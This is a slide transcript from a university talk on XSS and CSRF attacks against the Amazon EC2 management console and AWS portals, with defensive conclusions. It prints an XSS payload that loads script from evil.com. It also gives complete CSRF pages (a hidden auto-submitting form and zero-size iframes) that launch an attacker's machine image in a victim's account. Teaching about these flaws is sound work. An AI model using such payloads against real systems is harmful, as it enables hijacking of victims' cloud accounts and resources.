Cloud Insecurity

A short presentation for a university class.
Cloud Insecurity Presentation Transcript

  • 1. Marco Arena
  • 2. Outline • Recalls (XSS and CSRF) • Attacks against Amazon EC2 management console • Amazon EC2 real vulnerabilities – Web management console – Amazon Web Services (AWS) portals • Conclusions
  • 4. Recalls • XSS (Cross-Site Scripting) vulnerability allows an attacker to use a website to transmit an attack (the website becomes the vector through which attackers reach their victims). • XSS is today’s most widely reported software vulnerability.
  • 5. Recalls • XSS, a simple example (server-side JSP):
        <c:if test="${param.sayHello}">
          Hello ${param.name}!
        </c:if>
      Evil parameter:
        %3Cscript%20src%3D%22http%3A//evil.com/evil.js%22%3E%3C/script%3E
      Result:
        Hello <script src="http://evil.com/evil.js"></script>
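As an added example (not code from the presentation), the following Node.js snippet mirrors the slide's `Hello ${param.name}!` greeting and contrasts the vulnerable raw interpolation with the fix: HTML-encoding the parameter before it is written into the page, which is what JSTL's `<c:out>` does for the JSP above. The query string is constructed here from the slide's payload; `escapeHtml`, `renderGreetingRaw` and `renderGreetingSafe` are names chosen for this example.

```javascript
// Added example, not from the presentation: the reflected XSS from the JSP
// slide, rendered raw (vulnerable) and HTML-encoded (fixed).

// Encode the characters that let user input break out of HTML text or
// attribute context. This is what JSTL's <c:out> / fn:escapeXml does.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable rendering: the raw query parameter is spliced into the page,
// exactly like `Hello ${param.name}!` in the JSP.
function renderGreetingRaw(params) {
  if (params.sayHello !== "true") return "";
  return `Hello ${params.name}!`;
}

// Fixed rendering: same template, parameter HTML-encoded first.
function renderGreetingSafe(params) {
  if (params.sayHello !== "true") return "";
  return `Hello ${escapeHtml(params.name)}!`;
}

// Parse a query string the way a servlet container would: percent-decoding
// happens before the value reaches the template, so `%3C` becomes `<`.
function parseQuery(queryString) {
  const params = {};
  for (const [key, value] of new URLSearchParams(queryString)) {
    params[key] = value;
  }
  return params;
}

// Constructed query string carrying the slide's percent-encoded payload.
const EVIL_QUERY =
  "sayHello=true&name=%3Cscript%20src%3D%22http%3A//evil.com/evil.js%22%3E%3C/script%3E";

// Crude check used only to show the difference: is there a live script tag?
function containsScriptTag(html) {
  return /<script\b/i.test(html);
}

// Stand-alone run: show both renderings for the same request.
const params = parseQuery(EVIL_QUERY);
console.log("raw :", renderGreetingRaw(params));
console.log("safe:", renderGreetingSafe(params));
```

The point to take from the two outputs is that the safe version still shows the attacker's text to the user, but as inert text: the browser never sees an element, so no script request to evil.com is made.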
  • 6. Recalls • CSRF (Cross-Site Request Forgery) is an attack which forces an end user to execute unwanted actions on a web application in which he/she is currently authenticated. • CSRF tricks the victim into loading a page that contains a malicious request.
  • 7. Recalls • CSRF, a simple example: the evil site, loaded by a user who has an active session on a trusted blog (e.g. MySpace), contains
        ...
        <img src="http://trustedblog.com/addfriend.php?id=12345"/>
        ...
      [Diagram: User with an active session on the trusted blog, loading the evil site]
  • 9. Attacks against EC2 • The Amazon EC2 cloud is managed via web services and web interface consoles. • The web management console asks the user to provide her Amazon.com username and password. • The login page is hosted on the Amazon.com domain, making it susceptible to web application vulnerabilities found anywhere on the domain.
  • 10. Attacks against EC2 • Once an attacker gains access to the EC2 user’s session, the Amazon web management console offers a wealth of information related to the victim’s EC2 instances (X.509 certificates, secret tokens, ...).
  • 11. Attacks against EC2 • If the attacker discovers an XSS vulnerability anywhere on the Amazon.com domain, he can use a simple JavaScript payload to steal the EC2 user’s Access Key ID and Secret Access Key.
  • 13. Amazon EC2 real vulnerabilities • The security of AMI instances depends on the security of the web management console. • Several portions of Amazon’s web management console were vulnerable to cross-site request forgery (CSRF) attacks.
  • 15. Web management console vulnerabilities • The first allows the attacker to start an arbitrary AMI instance using the victim’s EC2 account. • Two parts: – Initialize an evil AMI; – Launch the instance under the victim’s EC2 account.
  • 16. Web management console vulnerabilities • initialize.html:
        <html>
        <body>
        <img src="https://console.aws.amazon.com/ec2/_launchWizardForm.jsp?action.ImageId=ami-00031337&architecture=i386&image_icon=%2Fimages%2Flogo_windows.gif&image_title=Basic%20Microsoft%20Windows%20Server%202003&selected_language=undefined&groupName=Webserver&keyName=undefined">
        </body>
        </html>
  • 17. Web management console vulnerabilities • initialize.html, annotated: the <img> element is a cross-domain image tag, so the attacker's page makes the browser request the console URL.
  • 18. Web management console vulnerabilities • launch.html:
        <html>
        <body>
        <form action="https://console.aws.amazon.com/ec2/runInstancesJson?" id="LaunchEvilAMI" name="LaunchEvilAMI" method="POST">
          <input type="hidden" name="action.MinCount" value="1" />
          <input type="hidden" name="action.InstanceType" value="m1.small" />
          <input type="hidden" name="action.SecurityGroup" value="default" />
          <input type="hidden" name="action.SecurityGroup" value="Webserver" />
          <input type="hidden" name="action.MaxCount" value="1000000" />
          <input type="hidden" name="action.ImageId" value="ami-00031337" />
          <input type="hidden" name="mbtc" value="50084" />
          <input type="hidden" name="region" value="us-east-1" />
        </form>
        <script>
          setTimeout("document.LaunchEvilAMI.submit()", 5000);
        </script>
        </body>
        </html>
  • 19. Web management console vulnerabilities
  • 20. Web management console vulnerabilities • Merge (one page on the attacker's site loading both):
        <html>
        <body>
        <iframe src="./initialize.html" height="0" width="0"></iframe>
        <iframe src="./launch.html" height="0" width="0"></iframe>
        </body>
        </html>
  • 21. Web management console vulnerabilities • Merge, annotated: because the iframes have zero size, the browser will not display the reply of the web server.
  • 22. Web management console vulnerabilities • The second vulnerability terminates arbitrary AMIs being run by the victim. • After the attack is launched, the victim can see that the instance was terminated without her consent.
  • 23. Web management console vulnerabilities • The last vulnerability involves the deletion of AMI key pairs. • Using a CSRF vulnerability, an attacker has the ability to delete arbitrary key pairs from a victim’s EC2 session. If the key pair is deleted, and the user has not properly backed up the key pair, he will have lost access to his own AMIs!
  • 25. AWS portals vulnerabilities • AWS was the first method Amazon provided to manage AMIs and is generally considered the most secure option for AMI administration. • The three most common methods of authentication are: – a username/password combination; – an Access Key ID/Secret Access Key combination; – X.509 certificates.
  • 27. AWS portals vulnerabilities • The first attack against AWS generates a new access key for the EC2 user’s session. • Access keys are used to authenticate a user to AWS, which is used to administer and manage the various AMIs running in a user’s account. • The attacker can create a temporary denial of service as the administrator must now update all the applications utilizing access key authentication to use the newly generated key.
  • 28. AWS portals vulnerabilities • This next attack forcibly deletes any X.509 certificates previously generated by the EC2 user. • Once the X.509 certificates are deleted, any application that relied on X.509 certificate authentication must be redeployed with the newly generated certificates.
  • 30. Conclusions • Cloud Computing allows organizations to focus on their core business while ensuring that their IT infrastructures are flexible enough to meet the demands of current and future users. • But it does not magically protect application logic from abuse or prevent attacks against the application level.
  • 31. Conclusions • Uploading the most hardened virtual machine will not prevent attacks against the web-based management consoles that are used to administer the virtual machines. • Cloud providers must fix their security bugs and perform continuous code review.
  • 32. References
      – Hacking: The Next Generation. Nitesh Dhanjani, Billy Rios, Brett Hardin. O’Reilly, 2009.
      – Hacking Exposed: Web 2.0. Rich Cannings, Himanshu Dwivedi, Zane Lackey. McGraw-Hill, 2008.
      – Secure Programming with Static Analysis. Brian Chess, Jacob West. Addison-Wesley, 2007.